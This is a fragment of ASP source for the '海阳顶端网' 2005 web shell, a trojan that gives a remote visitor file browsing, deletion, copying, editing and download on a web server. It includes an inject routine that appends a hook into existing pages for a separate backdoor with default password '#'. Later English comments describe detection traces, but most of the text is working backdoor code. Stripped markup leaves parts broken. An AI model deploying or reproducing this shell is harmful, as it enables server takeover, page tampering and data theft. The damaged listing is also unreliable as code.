Set theFolder=objfsolhn.GetFolder(cpath)
Set theSubFolders=theFolder.SubFolders
Response.write"回上级目录
"
For Each x In theSubFolders%>
<%Response.write" "&x.Name&" ×删除
"
Next
end if
%>
大小(字节)文件操作

<%
dim theFiles
if objfsolhn.FolderExists(cpath)then
Set theFolder=objfsolhn.GetFolder(cpath)
Set theFiles=theFolder.Files
Response.write""
For Each x In theFiles
if Request("attrib")="true" then
showstring=""&x.Name&""
else
showstring=""&x.Name&""
end if
Response.write"
"&showstring&""&x.size&" edit copy del down inject
"
%>

<% end sub
' edit(): file delete, copy, and load-for-editing, selected by the request value "op".
' In every branch the target is the client-supplied "path"; with attrib=true it is
' used as an absolute path, otherwise it is mapped through Server.MapPath.
' Defender note: none of the branches checks the result of the operation or restricts
' the path, so the effective limit is the NTFS permissions of the web application
' identity. File-integrity monitoring on the web root covers all three operations.
sub edit()
if request("op")="del" then
"**********删除文件********
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = objfsolhn.GetFile(whichfile)
' Delete with force = True, which also removes read-only files.
thisfile.Delete True
Response.write "
删除成功!要刷新才能看到效果.
"
"**********删除文件结束********
else
if request("op")="copy" then
"**********复制文件********
' Source is "path", destination is "dpath".
if Request("attrib")="true" then
whichfile=Request("path")
dsfile=Request("dpath")
else
whichfile=server.mappath(Request("path"))
dsfile=Server.MapPath(Request("dpath"))
end if
Set thisfile = objfsolhn.GetFile(whichfile)
thisfile.copy dsfile
Response.write "

源文件:"+whichfile+"

"
Response.write "

目的文件:"+dsfile+"
"
Response.write "

复制成功!要刷新才能看到效果!

"
"**********复制文件结束********
else
' No posted text: this is a request to show the editor form.
if request.form("text")="" then
' creat=yes means a new file, so there is nothing to load.
if Request("creat")<>"yes" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
' Opened for reading (1) without creating; the content is HTML-encoded for display.
Set thisfile = objfsolhn.OpenTextFile(whichfile, 1, False)
counter=0
thisline=Server.HTMLEncode(thisfile.readall)
thisfile.Close
end if
%>

">


bgColor=#b8b8b8 border=0 class="noborder">


height=22 bgcolor="#EEEEEE" >
海阳顶端网ASP木马@2005α版文件编辑器




height=22 bgcolor="#EEEEEE" >



height=22 bgcolor="#EEEEEE" >

value="提交" name="B1">



height=22 bgcolor="#EEEEEE" >文件名:
value="<%=Request("path")%>"readonly>


<%else
' Save branch of edit(): posted text is present, so the target file is created or
' overwritten with it.
' Defender note: this is the branch that modifies existing pages; unexpected changes
' in the modification time or hash of script files under the web root are the signal.
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set outfile=objfsolhn.CreateTextFile(whichfile)
' The whole posted value is written as one line, followed by a line break.
outfile.WriteLine Request("text")
outfile.close
Response.write "
修改成功!要刷新才能看到效果!
"
end if
end if
end if
end sub
%>
<% sub dir()
' dir(): deletes (op=del) or creates (op=creat) the directory named by the request
' value "path"; with attrib=true the value is used as an absolute path, otherwise it
' is mapped through Server.MapPath.
' Defender note: DeleteFolder is called with force = True and removes the folder with
' its contents; the success text is printed without checking the result.
if request("op")="del" then
"***********删除目录**********
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
objfsolhn.DeleteFolder whichdir,True
Response.write "
删除成功!要刷新才能看到效果,删除的目录为:"&whichdir&"
"
"**********删除目录结束*************
else
"***********新建目录**********
if request("op")="creat" then
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
objfsolhn.CreateFolder whichdir
Response.write "
建立成功!要刷新才能看到效果,建立的目录为:"&whichdir&"
"
"***********新建目录结束**********
end if
end if
end sub
"****下载文件
' downloadFile: streams a server-side file to the client as an attachment.
'   strFile - virtual path, used only when the request value attrib is empty; with
'             attrib=true the request value "path" is used as an absolute path instead.
' Defender note: this is the data-exfiltration path of the shell. Responses of type
' application/octet-stream with a Content-Disposition header coming from an .asp URL,
' and requests with id=down, are the observable traces.
function downloadFile(strFile)
if request("attrib")="" then
strFilename = server.MapPath(strFile)
end if
if request("attrib")="true" then
strFilename = Request("path")
end if
' Any other attrib value leaves strFilename unassigned.
Response.Buffer = True
Response.Clear
Set s = Server.CreateObject("ADODB.Stream")
s.Open
' Type 1 = binary stream.
s.Type = 1
on error resume next
if not objfsolhn.FileExists(strFilename) then
 Response.Write("

Error:

" & strFilename & " does not exist

")
 Response.End
end if
Set f = objfsolhn.GetFile(strFilename)
intFilelength = f.size
' The whole file is loaded into memory before it is sent.
s.LoadFromFile(strFilename)
if err then
 Response.Write("

Error:

" & err.Description & "

")
 Response.End
end if
' The file name is placed in the header unquoted and unencoded.
Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
Response.AddHeader "Content-Length", intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = "application/octet-stream"
 Response.BinaryWrite s.Read
Response.Flush
s.Close
Set s = Nothing
response.end
End Function
%>
<%"插入文件
' inject(): appends one line to an existing file under the web root, named by the
' request value "path" (relative-path mode only; attrib=true is refused).
' NOTE(review): the appended text is empty in this listing; the success message refers
' to a separate ASP backdoor with default password "#", so the literal was presumably
' markup removed during extraction.
' Defender note: the file is opened in append mode (8) with create = True, so a
' legitimate page gains an extra trailing line rather than being replaced. Comparing
' deployed script files against a known-good copy detects this where a simple
' "new file" check would not.
sub inject()
if Request("id")="inject" and request("attrib")<>"true"then
testfile=Server.MapPath(""&Request("path")&"")
set thisfile=objfsolhn.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine("")
thisfile.close
Response.write "succeed!请用冰狐浪子asp后门来来访问你插入的文件"&Request("path")&"默认密码是#"
else
Response.write "

"
Response.write ""
Response.write "
"
end if
end sub
%>
<%function fieldtype(typeid)
' Maps an ADO column data-type code to the Chinese label shown in the column listing:
' 130 wide-character text, 2 small integer, 3 integer, 7 date, 5 double, 11 boolean,
' 128 binary (labelled as OLE object). Any other code is returned unchanged.
select case typeid
case 130 fieldtype = "文本"
case 2 fieldtype = "整型"
case 3 fieldtype = "长整型"
case 7 fieldtype = "日期/时间"
case 5 fieldtype = "双精度型"
case 11 fieldtype = "是/否"
case 128 fieldtype = "OLE 对象"
case else fieldtype = typeid
end select
end function
' Left-pads str with prefix, one copy per missing character, and returns the result.
' NOTE(review): the line after the CStr call is damaged in this listing - the
' comparison and "then" between len(str) and the for loop are missing, presumably
' removed as markup during extraction. The surviving loop bound suggests padding up
' to totallen characters - confirm against an intact copy.
function fillbefore(str,prefix,totallen)
str=CStr(str)
if len(str)for i=1 to totallen-len(str)
str = prefix & str
next
end if
fillbefore = str
end function
%>


警告:对非法使用此程序可能带来的任何不良后果责任自负!海阳顶端网

此版本感谢:网辰在线、桂林老兵、冰狐浪子、蓝屏、小路、wangyong、czy、sun.c所做的一切努力◆LCX&ALLEN◆





==============
简 介: 增加以下功能:

1.服务器的fso改名也可以用此木马了,直接调用object组件。
2.鼠标操作Access和MSSQL数据库
3.独创的Access后门插入
4.mssql语句执行
5.直接插入冰狐浪子的asp后门
6.去掉了2004版的所有bug
此版可被杀毒软件发现,若有病毒提醒属正常现象
